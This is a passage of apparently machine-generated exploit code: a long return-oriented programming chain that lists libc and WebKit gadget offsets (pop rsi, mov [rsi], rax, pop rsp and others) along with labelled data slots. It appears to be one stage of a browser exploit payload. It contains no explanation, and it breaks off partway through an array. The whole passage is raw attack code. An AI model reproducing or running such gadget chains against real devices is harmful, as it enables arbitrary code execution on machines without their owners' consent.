set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+214232, //L3683
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3683:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+214288, //L3684
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3684:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+214424, //L3688
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+214408, //L3687
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3686:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3687:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3688:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+214512, //L3689
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+214544, //L3691
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3689:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3690:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3691:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+214616, //L3692
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3692:
db([0, 0]); // 0x0
//L3661:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+214744, //L3695
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+214760, //L3696
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+214728, //L3694
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3694:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3695:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3696:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+214920, //L3701
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+214936, //L3702
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+214872, //L3698
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3698:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3699:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3700:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3701:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3702:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+215048, //L3703+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+215040, //L3703
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3703:
db([0, 0]); // 0x0
set_gadgets([
ropchain+215064, //L3703+24
ropchain+217960, //L3697
libc_base+764760, //pop rsi
ropchain+215104, //L3704
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3704:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3706:
db([64, 0]); // 0x40
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+215224, //L3709
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+215208, //L3707
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3707:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3709:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+215384, //L3713
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+215352, //L3711
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+215368, //L3712
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3710:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L3711:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3712:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3713:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+215440, //L3715
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L3715:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+215568, //L3717
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+215584, //L3718
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+215552, //L3716
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3716:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3717:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3718:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+215744, //L3722
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+215712, //L3720
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+215728, //L3721
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3719:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L3720:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3721:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3722:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+215800, //L3724
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L3724:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+215928, //L3726
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+215944, //L3727
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+215912, //L3725
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3725:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3726:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3727:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+216104, //L3732
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+216120, //L3733
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+216056, //L3729
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3729:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3730:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3731:
db([1, 0]); // 0x1
set_gadget(webkit_base+3236123,); //pop r9
//L3732:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3733:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+216240, //L3734+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+216232, //L3734
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3734:
db([0, 0]); // 0x0
set_gadgets([
ropchain+216256, //L3734+24
ropchain+217584, //L3728
libc_base+764760, //pop rsi
ropchain+216296, //L3735
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3735:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3737:
db([96, 0]); // 0x60
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+216416, //L3740
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+216400, //L3738
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3738:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3740:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+216592, //L3743
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+216608, //L3744
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+216560, //L3741
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+216576, //L3742
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3741:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3742:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3743:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3744:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+216704, //L3746
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+216688, //L3745
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3745:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3746:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3747:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3748:
db([2, 0]); // 0x2
set_gadget(libc_base+763368,); //pop rcx
//L3749:
db([2, 0]); // 0x2
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3750:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3751:
db([3, 0]); // 0x3
set_gadget(libc_base+763368,); //pop rcx
//L3752:
db([3, 0]); // 0x3
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+217056, //L3754
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3754:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+217112, //L3755
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3755:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+217192, //L3758
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3758:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+217248, //L3759
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3759:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+217384, //L3763
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+217368, //L3762
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3761:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3762:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3763:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+217472, //L3764
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+217504, //L3766
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3764:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3765:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3766:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+217576, //L3767
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3767:
db([0, 0]); // 0x0
//L3728:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+217704, //L3770
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+217720, //L3771
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+217688, //L3769
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3769:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3770:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3771:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+217864, //L3774
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+217880, //L3775
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+217832, //L3772
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3772:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3773:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3774:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3775:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+217952, //L3776
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3776:
db([0, 0]); // 0x0
//L3697:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+218080, //L3779
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+218096, //L3780
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+218064, //L3778
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3778:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3779:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3780:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+218208, //L3782
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+218256, //L3785
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+218224, //L3783
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3782:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3783:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3784:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3785:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+218368, //L3786+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+218360, //L3786
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3786:
db([0, 0]); // 0x0
set_gadgets([
ropchain+218384, //L3786+24
ropchain+219096, //L3781
libc_base+764760, //pop rsi
ropchain+218424, //L3787
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3787:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3789:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+218544, //L3792
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+218528, //L3790
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3790:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3792:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+218720, //L3795
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+218736, //L3796
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+218688, //L3793
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+218704, //L3794
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3793:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3794:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3795:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3796:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+218832, //L3798
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+218816, //L3797
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3797:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3798:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+218920, //L3800
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L3799:
db([4294967295, 4294967295]); // -0x1
set_gadget(libc_base+759608,); //pop rax
//L3800:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+218976, //L3801
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3801:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3803:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+219056, //L3805
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3805:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L3781:
//L3806:
libc_base+764760, //pop rsi
ropchain+219136, //L3807
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3807:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3809:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+219256, //L3812
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+219240, //L3810
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3810:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3812:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+219400, //L3815
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+219368, //L3813
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+219384, //L3814
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3813:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3814:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3815:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+219480, //L3816
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3816:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3818:
db([80, 0]); // 0x50
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+219600, //L3821
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+219584, //L3819
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3819:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3821:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+219776, //L3824
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+219792, //L3825
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+219744, //L3822
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+219760, //L3823
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3822:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3823:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3824:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3825:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+219952, //L3829
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+219920, //L3827
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+219936, //L3828
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3826:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3827:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3828:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3829:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+220040, //L3830
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+220056, //L3831
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3830:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3831:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+220232, //L3833
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+220248, //L3834
